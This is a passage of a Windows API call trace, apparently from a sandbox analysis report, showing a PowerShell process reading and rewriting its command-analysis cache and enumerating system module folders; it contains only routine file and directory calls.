Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c1e0f98 | out: lpFileInformation=0x25b5c1e0f98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1)) returned 1 [0286.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8cb00) returned 1 [0286.128] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8c570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0286.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c9c0) returned 1 [0286.128] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8caa0 | out: lpFileInformation=0x653ef8caa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0286.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0286.128] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8c420, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0286.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c900) returned 1 [0286.128] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x998 [0286.129] GetFileType (hFile=0x998) returned 0x1 [0286.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c870) returned 1 [0286.129] GetFileType (hFile=0x998) returned 0x1 [0286.129] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e2500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c768, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e2500*, lpNumberOfBytesRead=0x653ef8c768*=0x1000, lpOverlapped=0x0) returned 1 [0286.133] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e42e2, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8c408, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e42e2*, lpNumberOfBytesRead=0x653ef8c408*=0x1f, lpOverlapped=0x0) returned 1 [0286.133] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e2500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c3d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e2500*, lpNumberOfBytesRead=0x653ef8c3d8*=0x1000, lpOverlapped=0x0) returned 1 [0286.135] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e42e4, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8c288, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e42e4*, lpNumberOfBytesRead=0x653ef8c288*=0x27, lpOverlapped=0x0) returned 1 [0286.135] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e2500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c328, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e2500*, lpNumberOfBytesRead=0x653ef8c328*=0x1000, lpOverlapped=0x0) returned 1 [0286.136] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e42b0, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8c1e8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e42b0*, lpNumberOfBytesRead=0x653ef8c1e8*=0x5, lpOverlapped=0x0) returned 1 [0286.136] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e2500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c288, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e2500*, lpNumberOfBytesRead=0x653ef8c288*=0x1000, lpOverlapped=0x0) returned 1 [0286.136] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e4282, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8c398, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e4282*, lpNumberOfBytesRead=0x653ef8c398*=0x1d, lpOverlapped=0x0) returned 1 [0286.136] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e2500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c438, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e2500*, lpNumberOfBytesRead=0x653ef8c438*=0xc85, lpOverlapped=0x0) returned 1 [0286.136] ReadFile (in: hFile=0x998, lpBuffer=0x25b5c1e2500, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c738, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1e2500*, lpNumberOfBytesRead=0x653ef8c738*=0x0, lpOverlapped=0x0) returned 1 [0286.136] CloseHandle (hObject=0x998) returned 1 [0286.137] CoTaskMemAlloc (cb=0x20c) returned 0x25b73f7fe30 [0286.137] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73f7fe30 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0286.137] CoTaskMemFree (pv=0x25b73f7fe30) [0286.137] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c460, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0286.137] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0286.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca40) returned 1 [0286.137] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb20 | out: lpFileInformation=0x653ef8cb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0286.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca00) returned 1 [0286.137] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_fc085d15-6209-49f0-964b-0399d47037a7", nBufferLength=0x105, lpBuffer=0x653ef8c4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_fc085d15-6209-49f0-964b-0399d47037a7", lpFilePart=0x0) returned 0x93 [0286.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c980) returned 1 [0286.137] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_fc085d15-6209-49f0-964b-0399d47037a7" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_fc085d15-6209-49f0-964b-0399d47037a7"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x998 [0286.139] GetFileType (hFile=0x998) returned 0x1 [0286.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c8f0) returned 1 [0286.139] GetFileType (hFile=0x998) returned 0x1 [0286.139] SetEndOfFile (hFile=0x998) returned 1 [0286.140] WriteFile (in: hFile=0x998, lpBuffer=0x25b5c1f0930*, nNumberOfBytesToWrite=0x46d, lpNumberOfBytesWritten=0x653ef8ca88, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1f0930*, lpNumberOfBytesWritten=0x653ef8ca88*=0x46d, lpOverlapped=0x0) returned 1 [0286.141] CloseHandle (hObject=0x998) returned 1 [0286.144] CoTaskMemAlloc (cb=0x20c) returned 0x25b73f83bd0 [0286.144] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73f83bd0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0286.144] CoTaskMemFree (pv=0x25b73f83bd0) [0286.144] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8c400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0286.144] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0286.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c9e0) returned 1 [0286.144] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cac0 | out: lpFileInformation=0x653ef8cac0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x80c5957a, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x80c5957a, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0286.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0286.145] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8c440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0286.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c920) returned 1 [0286.145] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x998 [0286.145] GetFileType (hFile=0x998) returned 0x1 [0286.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c890) returned 1 [0286.145] GetFileType (hFile=0x998) returned 0x1 [0286.145] SetEndOfFile (hFile=0x998) returned 1 [0286.147] WriteFile (in: hFile=0x998, lpBuffer=0x25b5c1f3038*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1f3038*, lpNumberOfBytesWritten=0x653ef8c168*=0x1000, lpOverlapped=0x0) returned 1 [0286.148] WriteFile (in: hFile=0x998, lpBuffer=0x25b5c1f3038*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1f3038*, lpNumberOfBytesWritten=0x653ef8c338*=0x1000, lpOverlapped=0x0) returned 1 [0286.149] WriteFile (in: hFile=0x998, lpBuffer=0x25b5c1f3038*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c2e8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1f3038*, lpNumberOfBytesWritten=0x653ef8c2e8*=0x1000, lpOverlapped=0x0) returned 1 [0286.149] WriteFile (in: hFile=0x998, lpBuffer=0x25b5c1f3038*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8c168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1f3038*, lpNumberOfBytesWritten=0x653ef8c168*=0x1000, lpOverlapped=0x0) returned 1 [0286.149] WriteFile (in: hFile=0x998, lpBuffer=0x25b5c1f3038*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x653ef8ca28, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1f3038*, lpNumberOfBytesWritten=0x653ef8ca28*=0xdda, lpOverlapped=0x0) returned 1 [0286.150] CloseHandle (hObject=0x998) returned 1 [0286.152] ReleaseMutex (hMutex=0xab8) returned 1 [0286.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cbe0) returned 1 [0286.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x653ef8c6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0286.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\*"), lpFindFileData=0x653ef8c8f0 | out: lpFindFileData=0x653ef8c8f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73f76910 [0286.153] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0286.153] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0286.153] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0286.153] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0286.154] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0286.154] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0286.154] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0286.154] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0286.155] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0286.155] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0286.155] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DirectAccessClientComponents", cAlternateFileName="DIRECT~1")) returned 1 [0286.155] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism", cAlternateFileName="")) returned 1 [0286.155] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2c7aa8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2c7aa8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DnsClient", cAlternateFileName="DNSCLI~1")) returned 1 [0286.156] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="EventTracingManagement", cAlternateFileName="EVENTT~1")) returned 1 [0286.156] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa2edd07, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa2edd07, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="International", cAlternateFileName="INTERN~1")) returned 1 [0286.156] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iSCSI", cAlternateFileName="")) returned 1 [0286.156] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa313f59, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa313f59, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0286.156] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kds", cAlternateFileName="")) returned 1 [0286.157] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0286.157] FindNextFileW (in: hFindFile=0x25b73f76910, lpFindFileData=0x653ef8c8b0 | out: lpFindFileData=0x653ef8c8b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, 